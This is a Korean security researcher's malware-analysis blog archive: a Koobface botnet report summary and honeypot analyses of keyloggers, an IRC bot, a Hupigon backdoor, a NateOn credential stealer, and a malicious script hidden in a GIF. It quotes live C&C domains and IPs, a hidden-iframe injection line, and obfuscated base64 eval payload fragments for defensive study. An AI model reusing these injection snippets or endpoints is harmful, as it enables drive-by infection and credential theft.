'Malware'에 해당되는 글 8건

  1. 2010.11.17 Koobface 봇넷의 내부 정보 및 재정을 공개한 보고서 발표
  2. 2009.06.16 alosha.endofinternet.org (1)
  3. 2009.05.29 welovewarez.com (1)
  4. 2009.05.26 www.520iq.com (2)
  5. 2009.05.25 www.gaogm.com
  6. 2009.05.23 네이트온 관련 악성코드 (9)
  7. 2009.05.20 gif 악성 스크립트 (5)
  8. 2009.05.18 shaody.1.jp.hapt03.cn (3)
0x04 reference&tools2010.11.17 10:21



[출처 : Symantec]

2010년 11월 12일(GMT), Koobface 봇넷 및 내부 운영에 대한 상세 정보를 공개하는 보고서가 발표되었습니다. 이 보고서는 해당 봇넷 일부 인프라의 실질적인 폐쇄와 때를 같이해 발표되었습니다.

영국에 기반한 ISP Coreix가 Koobface 봇넷 운영에 사용되는 이미 알려진 세 개의 C&C(Command and Control) 서버 중 하나에 대한 조치를 취했습니다.

Koobface는 소셜 네트워킹 사용자를 대상으로 하는 2008년 중반에 처음 모습을 드러낸 비교적 새로운 웜입니다. Koobface가 많은 소셜 네트워킹 사이트의 사용자들을 공격할 수 있지만, 특히 Facebook 사용자 대해 효과적인데, 이 때문에 Koobface라는 이름이 붙여졌습니다.

감염된 컴퓨터의 사용자가 자신의 계정에 로그인하면, 동영상과 같은 다양한 아이템에 대한 링크를 포함한 메시지를 게시할 목적으로 세션 가로채기가 수행됩니다. 해당 링크는 종종 다계층의 리디렉션을 수행하며, 최종적으로 비디오 코덱으로 위장한 위조 안티바이러스 소프트웨어를 전형적으로 제공하는 다양한 사이트로 연결됩니다.

해당 봇넷 운영의 재정 부분은 이 보고서에서 다루고 있는 흥미로운 부분입니다. 해당 정보는 이 봇넷 운영자들이 자신들의 사업을 제어 및 모니터링할 목적으로 관리하는 "mothership" 컴퓨터에 의해 관리되고 있는 파일
및 레코드에서 수집되었습니다.

해당 보고서는 Koobface가 PPC(Pay Per Click) 광고 및 악성 프로그램의 PPI(Pay Per Install)를 위주로 한 다양한 작업들을 통해 수익을 창출하고 있다고 언급하고 있습니다. 연구원들이 조사를 수행한 기간인 2009년 6월부터 2010년 6월 동안 해당 봇넷이 창출한 자금은 거의 미화 200만 달러에 달했습니다.


Koobface: Inside a Crimeware Network
http://www.infowar-monitor.net/reports/iwm-koobface.pdf

저작자 표시 비영리 변경 금지
신고
크리에이티브 커먼즈 라이선스
Creative Commons License
Posted by demantos

댓글을 달아 주세요

0x02 analysis2009.06.16 13:28

허니넷을 통해 획득한 파일입니다.

File name : yeah.exe
File size : 66734 byte
md5sum : b6d37181c6c5fba6dbd115ca14f15141


처음 실행했을땐 별거 아니라 생각했는데 생각보다 재미있는 녀석이라 포스팅합니다. ^^;

해당 파일을 실행하면 alosha.endofinternet.org의 8333번 포트로 접속합니다.




접속시 뭔가 데이터를 전송하고 있는데 뭔지는 잘 파악이 안되는군요..-_-;;




접속 후 전송하는 내용을 보aus alosha.endofinternet.org:8333 웹 서버로 특정 데이터를 계속 전송하는데 POST 방식을 사용하고 있었고
URL은 날짜와 시간으로로 된 경로명의 jsp 파일로 전송하고 있었습니다.




하지만 최초 연결 후 패킷을 캡쳐하는 동안에는 별다른 데이터를 전송하지 않고 있었고 모두 Contect-Length가 0이었습니다.
이런 사실들로 미루어 보아 최초 접속 후에는 Health-Check를 하는게 아닌가 하는 생각이 듭니다.




그리고 TCPView로 확인해보면 alosha.endofinternet.org(158.182.6.234)의 8333 포트로 연결되어 ESTABLISHED된 것을 확인할 수 있었습니다.




시스템에서의 변화는 파일이 4개가 생성되었고 서비스가 2개 추가되었습니다.





해당 서비스는 sbchost.exe를 통해서 서비스가 구동되고 있었고 해당 프로세스가 alosha.endofinternet.org(158.182.6.234)의 8333 포트로 연결하고 있었습니다.




생성되었던 oschkl.rxr 파일이 위에 보이시는 yrxkzgfp 서비스를 구동하는 파일이었고 나머지 3개의 파일은 Network Connection Manager 서비스와
연관이 있는 파일이었습니다.

그런데 이 3개의 파일들이 모두 각각 특징을 가지고 있었습니다.

oschkl.hbv : 언제 어떤 프로세스를 실행했는지에 대한 기록 저장
oschkl.gtm : 사용자가 실행시킨 프로세스에 DLL 인젝션되는 파일
438d5.kol : 어디에 사용되는지 잘 모르겠지만 내용은 0만 가지고 있음

oschkl.hbv 파일은 IE를 후킹해서 오픈한 사이트와 입력한 문자열들도 모두 저장하고 있었습니다.
아래 그림을 보시면 시간 정보와 실행한 프로세스 혹은 선택한 프로그램에 대한 정보를 기록하고 있었고
naver.com에 접속해서 demantos라는 아이디와
hahaha라는 패스워드를 입력한 결과도 저장하고 있었습니다.




oschkl.htm은 현재 실행되고 있는 모든 프로세스에 DLL 인젝션되고 있었고 새로 실행되는 프로세스에도 인젝션을 하고 있었으며
모든 프로세스에서 발생되는 이벤트(?)들을 기록하고 있었습니다.




좀 더 확인을 해보니 사용자가 입력한 키값도 그대로 저장하고 있더군요(키보드 후킹)
아래 내용은 제가 시작 -> 실행에서 services.msc를 입력한 후 mmc.exe가 실행된 것을 후킹한 내용과 서비스 관리 메뉴에서 yrxkzgfp 서비스를 검색하기 위해
y를 두번 누르고 Network Connection Manager를 찾기 위해 net을 입력한 내용입니다.







지속적으로 모니터링을 했지만 alosha.endofinternet.org:8333로 oschkl.hbv 파일의 내용은 전송하지 않는 것으로 보입니다.
하지만 계속 연결이 되어 있는 것으로 보아 해당 도메인은 C&C 도메인일 가능성이 높고
공격자가 특정 명령을 수행하면 oschkl.hbv 파일의 내용을 가져갈 것으로 생각됩니다.


안타까운 사실은 역시나 국내 백신 엔진들이 아직 탐지를 못하고 있다는 것이었습니다.

http://www.virustotal.com/ko/analisis/5d6fa1ef7df98256cb9640cd3a6b2177567a90d289d271f121cedb7eabc0f0bc-1245119564









저작자 표시 비영리 변경 금지
신고
크리에이티브 커먼즈 라이선스
Creative Commons License
Posted by demantos

댓글을 달아 주세요

  1. 추가해야 겠네요^^

    2009.06.16 14:54 신고 [ ADDR : EDIT/ DEL : REPLY ]

0x02 analysis2009.05.29 14:56

어제 허니넷에서 획득한 파일 중 특이한 녀석이 있어서 분석해봤습니다.
그다지 특이하지 않을 수 있지만 보인에겐 좀 특이했습니다. -_-;;

일단 Dropper FTP에 접속하니 몇개의 파일들이 있었습니다.




이 중에서 다운로드하여 실행하는 악성코드는 JEW.EXE였습니다.
JEW.EXE외의 다른 파일들도 악성코드라 생각되어 Virustotal에 업로드해보니 FEG.EXE와 KICK.EXE는 악성코드가 아니라고 나왔고
TWAT.EXE는 40개 엔진 중 3개의 엔진에서만 악성코드로 탐지하고 있었습니다.
개인적으로 TWAT.EXE 파일이 뭔가 좀 의심스럽습니다. 추후 별도로 분석을 해볼 생각입니다.
바이러스토탈 결과는 제일 아래쪽 첨부하였으니 참고하시면 되겠습니다.


일단 JEW.EXE의 행동분석을 해봤습니다.

File size : 97,284 byte
md5sum : 32c4534068a9e83634b90aae40c8a1de

항상 그랬듯이 winalysis로 시스템의 변화를 살펴보았는데 레지스트리만 변경되고 파일이나 서비스 등 다른 항목에서의 변화는 없다고 나왔습니다.
그런데 확인 결과 winalysis가 저에게 거짓말을 하고 있었습니다. -_-




그런데 실제로는 C:\WINDOWS\system 폴더에 iexplorer.exe 파일이 생성되어 있었습니다.




iexplorer.exe는 JEW.EXE와 파일 사이즈 및 md5 해쉬값이 동일한 같은 파일이었습니다.

솔직히 지금까지 모르고 있었던게 우리가 사용하는 IE 브라우저의 파일명이 iexplore.exe라는 것입니다.
악성코드와 알파벳 r 하나 차이가 있습니다. 지금까지는 iexplorer.exe가 IE 브라우저의 파일명이라고 생각했었습니다.

아마 이 글을 읽고 계신 여러분들께서는 이러한 사실을 알고 계셨던 분들도 계실것이고 모르셨던 분들도 계셨을겁니다.
저는 오늘 알았습니다. ^^;


다시 본론으로 넘어오겠습니다.

악성코드 실행시 변경되는 레지스트리 중 다음과 같은 내용이 있었습니다.

  HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications
  \List\C:\WINDOWS\system\iexplorer.exe   
C:\WINDOWS\system\iexplorer.exe:*:Enabled:iexplorer
  HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications
  \List\C:\WINDOWS\system\iexplorer.exe    C:\WINDOWS\system\iexplorer.exe:*:Enabled:iexplorer


윈도우 방화벽 정책에서 해당 프로그램(iexplorer.exe)의 외부 접속에 대한 허용 설정을 하는 레지스트리였습니다.

그리고 악성코드 실행시 tl6.welovewarez.com으로 접속하는 것을 확인할 수 있었습니다.




여기서 좀 이상했던 점이 있었는데 tl6.welovewarez.com이나 welovewarez.com을 nslookup으로 확인해보면 85.17.141.84라는 아이피가 나옵니다.
85.17.141.84로 reverse lookup을 해보면 google.com이 나옵니다. 둘이 어떤 관계일까요? -_-;;




아무튼 tl6.welovewarez.com의 8782번 포트로 접속하는데 IRC 서버였습니다.
제가 접속할 당시에는 IRC에서 65.x.x.x:445로 랜덤 포트스캔 명령을 전달하고 있었습니다.




IRC서버에 접속해서 명령을 받아오는 프로세스는 앞에서 생성되었던 C:\WINDOWS\system\iexplorer.exe이고
65.x.x.x로 랜덤 포트 스캔도 해당 프로세스가 수행하고 있었습니다.





결국 JEW,EXE를 실행하면 C:\WINDOWS\system\iexploere.exe를 생성하고 이 파일은 tl6.welovewarez.com의 8782번 포트로 접속하는데
tl6.welovewarez.com은 C&C 서버였고 접속 당시 해당 C&C 서버에서 좀비에게 65.x.x.x:445 포트 스캔 명령을 내리고 있었습니다.

다행히 V3, nProtect, Virobot에서는 모두 탐지하고 있었습니다.




추가적으로 확인해봐야겠지만 FTP에 있던 다른 파일들도 JEW.EXE 파일과 연관성이 있지 않을까 하는 생각이 듭니다.
특히 TWAT.EXE는 파일 사이즈도 큰데다가 3개의 엔진에서만 악성코드로 탐지하고 있어서 분명 뭔가 있을 듯 합니다.

내일도 근무니 내일 한번 확인해봐야겠습니다.




아....이런.... 어리버리한 짓을 했습니다.
FTP에서 파일을 받을때 bin 옵션을 주지 않고 그냥 받았네요. -_-;;
덕분에 TWAT.EXE가 사이즈가 왜 다른가 했더니 ASCII 모드로 받아서 그랬습니다.
TWAT.EXE 다시 받았더니 SFX RAR 파일이군요..
거기다가 SCUM.EXE 파일이 추가되었습니다. (White Zombie의 Scum of the Earth가 생각 나는군요...^^;)
어제는 없었는데 확인해보니 어제 퇴근 후에 파일이 추가된 듯 합니다.
분석해볼께 하나 더 늘었군요~

확인해보니 SCUM.EXE는 JEW.EXE와 사이즈는 다르지만 행동은 동일한 듯 합니다.
시점의 차이인지 파일의 차이인지 바이너리를 까봐야 알겠지만 SCUM.EXE를 실행하면 91.x.x.x로 스캔을 하고 있었습니다.

TWAT.exe의 바이러스토탈 결과는 삭제했습니다.
압축 파일 안에 4개의 파일이 있으니 압축을 풀어서 분석해봐야겠습니다.



바이러스토탈 검사 결과

FAM.EXE

더보기

FEG.EXE

더보기

HO.EXE

더보기

JEW.EXE

더보기

KICK.EXE

더보기

SCUM.EXE

더보기


저작자 표시 비영리 변경 금지
신고
크리에이티브 커먼즈 라이선스
Creative Commons License
Posted by demantos

댓글을 달아 주세요

  1. 포스팅 잘 보았습니다.

    습득하신 파일들 중에.. 아얄씨 봇에 해당하는 파일은 안 가지구 계시는 건가요?흠

    2009.06.02 09:54 신고 [ ADDR : EDIT/ DEL : REPLY ]

0x02 analysis2009.05.26 15:12

오늘도 허니넷을 통해 획득한 악성코드를 실행해 보았습니다.
해당 악성코드는 FTP를 통해서 유포되고 있었으며 FTP 접속 후에 확인 결과 동일한 기능을 하는 여러가지 파일들이 있었습니다.
파일명은 519.exe, 522.exe, 523.exe와 같은 이름을 가지고 있었고 519.exe 파일의 경우 아이콘이 ini 파일의 아이콘을 가지고 있었습니다.

파일명 File Size md5sum
519.exe 464891 byte
c855c9cb654ffdd5d05e24a73896d949
522.exe 464379 byte
4a779c24f2d7535fa823bad27b444e0d
523.exe 464398 byte
2dec5b260113417fcfb826948941f19f


보시다시피 파일사이즈도 약간씩 다르고 md5sum값도 다르긴 하지만 실제 악성코드 실행시 행동은 동일하였습니다.
따라서 본 분석에서는 실제 허니넷에서 탐지되었던 523.exe를 분석하도록 하겠습니다.

523.exe를 실행하면 3개의 새로운 파일이 생성되었고 1개의 서비스가 등록되었습니다.






성성된 파일 중 systemServer.exe는 서비스를 구동하기 위한 파일이었고 원본 악성코드와 동일한 사이즈를 가지고 있는 동일한 파일이었습니다.




systemServer 서비스 속성입니다.




systemServer.exe 파일은 spoolsv.exe, explorer.exe, winlogon.exe 프로세스가 실행되고 있는지 차례대로 검사합니다.
만약 있다면 해당 프로세스에 revreSmetsys.dll 파일을 인젝션시켜 실행시킵니다.




악성코드 실행 당시엔 spoolsv.exe 프로세스가 실행되고 있어서 spoolsv.exe에 revreSmetsys.dll을 인젝션시켜 실행시키고 있습니다.




그리고 spoolsv.exe 프로세스는 www.520iq.com/ip.txt 파일을 요청하는 HTTP 패킷을 전송합니다.
ip.txt 파일에는 http://124.72.93.158:8761 이라는 내용이 들어 있습니다.
이것은 124.72.93.158의 8761번 포트로 연결하라는 의미로 해석할 수 있습니다.




위 패킷을 보시면 124.72.93.158의 8761번 포트로 연결을 시도하지만 실제 연결은 되지 않고 있습니다.

즉, www.520iq.com은 거쳐가는 하나의 관문 정도로만 생각할 수 있고 실제 C&C 서버는 124.72.93.158일 가능성이 큽니다.
하지만 연결이 되지 않고 있기 때문에 정확하다고 말하기는 좀 힘들 듯 합니다.



어찌되었던 www.520iq.com과 124.72.93.158은 악성 사이트라고 간주할 수 있겠습니다.


아...그리고 zkeyHook.dll은 실행 당시 어떠한 프로세스에서도 사용하고 있지 않은 것으로 보아
124.72.93.158에 접속이 된 경우에 사용되는 파일인 것으로 추정되니다.



오늘도 빈약한 분석글 읽으시느라 고생하셨습니다.
앞으로는 좀 더 양질의 분석글이 되도록 하겠습니다. ^^;;\





저작자 표시 비영리 변경 금지
신고
크리에이티브 커먼즈 라이선스
Creative Commons License
Posted by demantos

댓글을 달아 주세요

  1. darkhi

    개인적으로 궁금한 것이 생겨서 질문해봅니다.
    현업에서 실제로 악성코드 분석할 때에는
    코드에 중점을 두기보다는
    행동패턴에 중점을 두고 분석하는 것이 많나요?

    2009.05.27 00:33 신고 [ ADDR : EDIT/ DEL : REPLY ]
    • 모두 다 그런것은 아닙니다.
      백신업체에 계신분들은 코드에 중점을 두고 분석을 하실겁니다.
      저는 현재 ISP 보안관제센터에 있다보니 코드에 중점을 두고 분석할만한 시간적 여유가 없기때문에
      행동분석을 하고 악성 도메인이나 IP가 나오면 그것을 차단하고 있습니다.

      그리고 행동분석이 가장 쉬우니까요...^^;

      2009.05.27 08:36 신고 [ ADDR : EDIT/ DEL ]

0x02 analysis2009.05.25 15:09

허니넷 Dropper에서 획득한 파일에 대한 분석입니다.

획득한 파일의 파일 사이즈와 md5sum입니다.

File size : 552,960 byte
md5sum : 49a84bd7144ae8384b9fb2e01572f2ad

해당 파일 실행시 파일을 1개 생성하고 1개를 삭제하며 서비스를 1개 등록합니다.






삭제된 파일인 ieapfltr.dat는 피싱필터에 사용되는 파일이었습니다.

새롭게 생성되는 amdcpusetup.exe 파일은 원본 파일과 동일한 파일이었고 이 파일을 통해서 LanmandeQorkstation 서비스가 구동되고 있었습니다.




원본 파일과 동일한 사이즈를 가지고 있었으며 md5sum값도 동일하였습니다.
그리고 해당 파일은 LanmandeQorkstation 서비스를 구동하는 실행파일이었습니다.





그리고 해당 파일 실행 후 파일을 생성하고 서비스를 등록한 후에는 iexplorer 프로세스를 실행하여 www.gaogm.com으로 연결하고 있었습니다.




www.gaogm.com으로 접속한 후 ok.jpg 파일을 받는데 ok.jpg 파일은 이미지 파일이 아니고 아래 내용이 있었습니다.

  http://61.131.15.131:8000/www/root/

처음에는 www.gaogm.com의 80번 포트로 연결을 하고 ok.jpg 파일을 다운 받은 후 8000번 포트로 연결하는 것을 확인하실 수 있습니다.
8000번 포트로 연결 후에는 클라이언트가 서버(www.gaogm.com)으로 자신의 운영체제 정보를 전송하고 있습니다.

 Windows XP 5.1 (2600.Service Pack 3)............GUOCYOK88.....GUOC..

(중간에 일부 쓸데 없는 글자는 삭제하였습니다.)

8000번으로 접속 후 운영체제 정보를 전송하는 것으로 보아 www.gaogm.com 도메인은 C&C인 것으로 판단됩니다.
netbot과 같은 악성코드들에 감염된 PC들도 C&C 서버로 접속시 자신의 운영체제 정보를 전송하고 있었기 때문입니다.
확실한건 아니지만 지금까지 나왔던 패턴으로 보아 C&C일 가능성이 가장 큽니다.

그리고 V3나 Virobot, nProtect에서는 아직 탐지되지 않고 있었습니다.

안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 4.0.0.101 2009.05.25 Backdoor.Win32.Hupigon!IK
AhnLab-V3 5.0.0.2 2009.05.25 -
AntiVir 7.9.0.168 2009.05.24 BDS/Hupigon.Gen
Antiy-AVL 2.0.3.1 2009.05.22 -
Authentium 5.1.2.4 2009.05.24 W32/Hupigon.K.gen!Eldorado
Avast 4.8.1335.0 2009.05.24 -
AVG 8.5.0.339 2009.05.24 BackDoor.Hupigon5.GHS
BitDefender 7.2 2009.05.25 Backdoor.Hupigon.AAFC
CAT-QuickHeal 10.00 2009.05.23 (Suspicious) - DNAScan
ClamAV 0.94.1 2009.05.24 -
Comodo 1157 2009.05.08 -
DrWeb 5.0.0.12182 2009.05.24 BackDoor.Pigeon.15147
eSafe 7.0.17.0 2009.05.24 -
eTrust-Vet 31.6.6519 2009.05.23 -
F-Prot 4.4.4.56 2009.05.24 W32/Hupigon.K.gen!Eldorado
F-Secure 8.0.14470.0 2009.05.25 -
Fortinet 3.117.0.0 2009.05.25 -
GData 19 2009.05.25 Backdoor.Hupigon.AAFC
Ikarus T3.1.1.49.0 2009.05.25 Backdoor.Win32.Hupigon
K7AntiVirus 7.10.741 2009.05.21 -
Kaspersky 7.0.0.125 2009.05.25 -
McAfee 5625 2009.05.24 New Malware.ix
McAfee+Artemis 5625 2009.05.24 New Malware.ix
McAfee-GW-Edition 6.7.6 2009.05.24 Trojan.Backdoor.Hupigon.Gen
Microsoft 1.4701 2009.05.24 Backdoor:Win32/Hupigon.gen!B
NOD32 4099 2009.05.25 -
Norman 6.01.05 2009.05.22 -
nProtect 2009.1.8.0 2009.05.24 -
Panda 10.0.0.14 2009.05.24 Suspicious file
PCTools 4.4.2.0 2009.05.21 -
Prevx 3.0 2009.05.25 -
Rising 21.31.00.00 2009.05.25 Backdoor.Win32.Gpigeon2008.cch
Sophos 4.42.0 2009.05.25 -
Sunbelt 3.2.1858.2 2009.05.24 VIPRE.Suspicious
Symantec 1.4.4.12 2009.05.25 -
TheHacker 6.3.4.3.331 2009.05.25 -
TrendMicro 8.950.0.1092 2009.05.25 -
VBA32 3.12.10.5 2009.05.25 OScope.Backdoor.Hupigon.axbr
ViRobot 2009.5.25.1750 2009.05.25 -
VirusBuster 4.6.5.0 2009.05.24 -



바이러스랩님께 파일 전달했으니 nProtect는 조만간 패턴 업데이트될겁니다.





저작자 표시 비영리 변경 금지
신고
크리에이티브 커먼즈 라이선스
Creative Commons License
Posted by demantos

댓글을 달아 주세요

0x02 analysis2009.05.23 11:12

Viruslab님의 블로그에 올라온 [Nateon]네이트온 쪽지로 신종 악성코드 유포 중 이라는 글을 보고
어...이거 본 적 있는데....하고 뒤져보니 10일 전에 회사에서 분석보고서를 썼더군요 ^^;
그때 제가 가지고 있었던 정보는 단지 도메인뿐이었습니다.
그래서 Viruslab님의 분석 글과는 약간의 차이가 있을 수 있습니다.

일단 제가 분석을 한 도메인은 www.nouydds.com 이었습니다.
해당 도메인에 접속시 www.tw-nsn.com/gif/jpg.scr로 리다이렉션 되면서 jpg.scr을 다운 받을 수 있었습니다.




특정 취약점을 공격하면 바로 실행시킬 수 있겠죠..

항상 하던 방식대로 일단 실행시켜보니 파일을 6개 생성하였고 그 중에서 5개가 실제 감염된 PC에 영향을 미치는 것으로 보입니다.




새로 생성된 파일들은 시스템 속성(S)과 숨김속성(H)을 가지고 있었습니다.
이 중 hf0214.exe와 hf0214.dll은 상당히 눈에 익었던 녀석들인데 어떤 기능을 하는 녀석들인지는 까먹었습니다. -_-;;
아무튼 hf0214.exe는 레지스트리에 등록되어 있어 재부팅시에도 실행되게끔 되어 있었습니다.




Process Explorer에서 hf0214.dll을 확인해 본 결과 현재 실행되고 있는 주요 프로세스에 인젝션되어 실행되고 있었습니다.




hf0214.dll에서 문자열만 추출해 봤더니 메이플스토리, 바람의 나라 등 게임 프로그램과 Internet Explorer를 후킹하는 듯 보였고
이렇게 후킹하여 가로챈 데이터를 HTTP를 통해서 어떤 데이터를 보내기 위한 함수들도 보였습니다.

         



단지 추측에 지나지 않을 수 있지만 URL에 특정 파라미터들이 오는지도 확인하는 듯 보입니다.




그리고 네이트온과 관계가 있어 보이는 악성코드인 ywulin.dll은 NateOnMain.exe 파일에 인젝션되어 동작하고 있었으며
네이트온 로그인시 로그인 정보를 후킹하여 특정 사이트로 전송하고 있었습니다.




후킹 함수와 URL을 오픈하는 함수가 보입니다.




이상한 URL이 보입니다.




실제로 네이트온에 가짜 계정 정보를 입력해보니 www.xdqxzq.com으로 계정 정보를 보내고 있었습니다.










결국 www.nouydds.com, tw-nsn.com, www.xdqxzq.com 모두 악성사이트라고 판단되어 모두 차단하였는데(모두 중국 IP)

URL을 변경하면서 계속 유포되고 있다고 하니 각별히 주의를 기울이셔야 할 듯 합니다.

아쉽게도 샘플파일이 없어져버려서 Virustotal에는 올려보지 못했지만 대부분 백신업체들이 해당 악성코드에 대한 패턴을 업데이트했으리라 봅니다.

바이러스랩님께서 분석글을 올리신걸 보면 nProtect는 업데이트된 듯 하구요...





저작자 표시 비영리 변경 금지
신고
크리에이티브 커먼즈 라이선스
Creative Commons License
Posted by demantos

댓글을 달아 주세요

  1. 현재 유포되는 곳은 도메인이 변경되었답니다.

    2009.05.23 12:13 신고 [ ADDR : EDIT/ DEL : REPLY ]
    • 계속 변경되나 봅니다. 좋은 정보 감사합니다.
      그런데 새로운 도메인은 어떻게 찾아야 할지...

      2009.05.23 12:17 신고 [ ADDR : EDIT/ DEL ]
  2. darkhi

    네이트온 로그인 할 때 계정정보가 전달이 된다는 건가요?
    그러면 네이트온 키보드 보안 레벨은 무용지물인가요?

    2009.05.23 18:17 신고 [ ADDR : EDIT/ DEL : REPLY ]
    • 네 무용지물이라고 보시는게 좋을 듯 합니다.
      이미 NateOnMain.exe라는 네이트온 프로그램에 인젝션된 DLL 파일이 정보를 가로채서
      특정 사이트로 보내고 있으니까요..

      2009.05.25 10:06 신고 [ ADDR : EDIT/ DEL ]
  3. 피해자

    그러면..이거 없애거나 치료할 방법은없는건가요?
    지금 저희집이 걸려서 네이트온안켜는데 ..
    어떠케해야하나요 지금 오후10시 다되가는데
    어제 저녁에 바이러스 클릭해서 실행한거 가튼데..
    어떠케해야되나요

    2009.05.23 21:42 신고 [ ADDR : EDIT/ DEL : REPLY ]
  4. ymj

    이거 치료할방법없나요 ㅠ
    지금 미칠것같아요 아 ..

    2009.05.24 23:20 신고 [ ADDR : EDIT/ DEL : REPLY ]
  5. 네이트온 정보를 탈취하는 서버 역시 변경하면서 꾸준하게 유포하고 있더군요.

    잘 봤습니다.^^

    2009.05.31 13:17 신고 [ ADDR : EDIT/ DEL : REPLY ]
  6. 워낙에 이상한 낌새가 들어서 다운은 받지 않았지만...
    네이트온 측에서도 인지를 하고 있을까요....;;;

    2009.06.28 18:25 신고 [ ADDR : EDIT/ DEL : REPLY ]
  7. ㅠㅠ

    이거 방법없나요?정말미치겠어요

    2009.07.02 20:40 신고 [ ADDR : EDIT/ DEL : REPLY ]

0x02 analysis2009.05.20 16:05

국내 한 사이트에서 gif로 된 악성 스크립트를 발견하였습니다.
gif로 된 악성코드가 아닌 악성 스크립트...

소스코드를 살펴보니

  <td width="490" height=49 background=http://www.xxxxxxx.or.kr/logif.gif bgcolor=#ffffff>
  <table border=0 cellpadding=0 cellspacing=0 width=400 align=right><tr><td>
  <script language="javascript" type="text/javascript" src="icon/include.gif"></script>

이렇게 되어 있는데 실제 gif 파일은
/bbs/icon/include.gif로 되어 있었습니다.

파일을 다운 받아 exe 파일이겠거니 하고 봤더니 아니더군요...-_-;;




document.write("<iframe width='0' height='0' src='http://d.xin8.info/daipi/css.htm'></iframe>");

이런 내용을 담고 있었습니다.

배상우님의 해킹에 도움이 되는 IE 기능 (GIF+JavaScript) 글을 참조하시면 좀 더 자세한 내용을 접하실 수 있습니다.

일단은 gif에 자바스크립트를 숨겨 놓은 것만으로도 악의적인 의도가 다분합니다.
일단 css.htm 파일을 확인해보면 눈에 보기에 복잡하기 해놨습니다. @.@

<html>
<head>
<title>xin8.info</title>
<script type="text/javascript" src="/js/general.js"></script>
<script type="text/javascript">
ChkRequest4('117109','2009-05-20 11:26:52','221.139.14.3','','9','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)','/daipi/css.htm','15','http://www.malkm.com/?dn=xin8.info&pid=1POOF2464','xin8.info','','','');
</script>
<script type="text/javascript">
var fl = "cpx";
var u = "/" + fl + ".php";

u = u + "?did=117109&ts=2009-05-20%2011%3A26%3A52&ip=xxx.xxx.xxx.xxx&sid=9&ref=&ua=Mozilla%2F4.0%20%28compatible%3B%20MSIE%207.0%3B%20Windows%20NT%205.1%29&url=%2Fdaipi%2Fcss.htm&uid=15&rdr=http%3A%2F%2Fwww.malkm.com%2F%3Fdn%3Dxin8.info%26pid%3D1POOF2464&dn=xin8.info&soff=&sbid=&sinf=";
var w = '690';
var h = '320';
var wV = 'scrollbars=no,resizable=yes,toolbar=no,' + 'menubar=no,status=no,location=no,height=' + h + ',width=' + w;
tW = window.open(u, "tWin", wV);
if (null !== tW)
{
 tW.blur();
 window.focus();
}
</script>



css.htm 파일에서 스크립트에 의해 다음 URL을 호출하고 있었습니다.

hxxp://d.xin8.info/cpx.php?did=117109&ts=2009-05-20%2011%3A26%3A52&ip=xxx.xxx.xxx.xxx&sid=9&ref=&ua=Mozilla%2F4.0%20%28compatible%3B%20MSIE%207.0%3B%20Windows%20NT%205.1%29&url=%2Fdaipi%2Fcss.htm&uid=15&rdr=http%3A%2F%2Fwww.malkm.com%2F%3Fdn%3Dxin8.info%26pid%3D1POOF2464&dn=xin8.info&soff=&sbid=&sinf=

이 URL을 따라 들어가보면

<html>
<head>
<title>Blank</title>
<script type="text/javascript" src="/js/general.js"></script>
<script type="text/javascript">
ChkPopunder4('117109','2009-05-20 11:26:52','221.139.14.3','','9','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)','/daipi/css.htm','15','http://www.malkm.com/?dn=xin8.info&pid=1POOF2464','xin8.info','','','');
</script>
<script type="text/javascript" src="hxxp://panther1.cpxinteractive.com/mz/Trellian.js"></script>
<script type="text/javascript">window.close();</script>
</head>
<body></body>
</html>

이번에는 hxxp://panther1.cpxinteractive.com/mz/Trellian.js 파일을 호출합니다.
Trellian.js 파일을 열어 보면

document.writeln('<SCRIPT TYPE="text\/javascript" SRC="http:\/\/adserving.cpxinteractive.com\/st?ad_type=pop&ad_size=0x0&section=623281&banned_pop_types=29&pop_times=1&pop_frequency=0&pop_nofreqcap=1">
<\/SCRIPT>');

이번에도 또 다른 URL을 호출하고 있습니다.
몇번 봤던 패턴이라 신기하지는 않고 지겹군요...-_-
별 수 없습니다. 또 쫓아서 들어가 봤습니다.




개인적으로 싫어하는 스타일의 자바스크립트입니다.
딱 봐서 어떤 내용인지 짐작이라도 할 수 있어야 하는데 이런 스타일은 짐작하기도 힘들거든요..
혹시 쉽게 아실 수 있는 노하우가 있으시다면 저에게 전수를...
어쩔 수 없이 보기 좋게 엔터를 쳐가면서 삽질 좀 했습니다.

...(생략)...
rm_url = "hxxp://adserving.cpxinteractive.com/imp?Z=0x0&y=29&s=623281&_salt=4141222443";
...(생략)...
var rm_tag_src='<SCRIPT TYPE="text/javascript" SRC="'+rm_url+'"><\/SCRIPT>';
if(rm_pop_frequency){
 if(rmCanShowPop(rm_pop_id,rm_pop_times,rm_pop_frequency)||rm_pop_nofreqcap){
  document.write(rm_tag_src);
 }
}else{
 document.write(rm_tag_src);
}
...(생략)...


동일한 도메인에서 다른 페이지를 호출합니다.

hxxp://adserving.cpxinteractive.com/imp?Z=0x0&y=29&s=623281&_salt=4141222443&B=10&r=1

이 URL은 또 다른 URL에 리다이렉션 됩니다.

hxxp://ad.yieldmanager.com/imp?Z=0x0&y=29&s=623281&_salt=4141222443&B=10&r=1

리다이렉션되어 들어간 페이지는 또 사람을 짜증나게 합니다. ㅜ.ㅜ




전체 내용은 첨부파일 참조하시면 되겠습니다. 제가 임의로 엔터를 쳐서 보기 좋게 했습니다.
이 파일에서 주의 깊게 봐야할 부분은 fv6파는 함수입니다. 아래와 같은 형식들이 자주 나오고 있습니다.

...
oV5.write(fV6('PGlucHV0IHN0eWxlPSJ3aWR0aDowcHg7IHRvcDowcHg7IHBvc2l0aW9uOmFic29sdXRlOyB2aXNpYmlsaXR5Omhp
ZGRlbjsiIGlkPSJvVjYiIG9uY2hhbmdlPSJmVjgoZlYxLDUsdHJ1ZSkiPg=='));
oV5.write(fV6('PGRpdiBzdHlsZT0iZGlzcGxheTppbmxpbmUiIGlkPSJvVjEwIj48L2Rpdj4='));
...
oV3.location=fV6('YWJvdXQ6Ymxhbms='); 
...
oV8.innerHTML=fV6(vV1);
...
eval(fV6('d28ucHc9by5ET00uU2NyaXB0Lm9wZW4od28ubG9jYXRpb24sJycsd28udik7'));
...
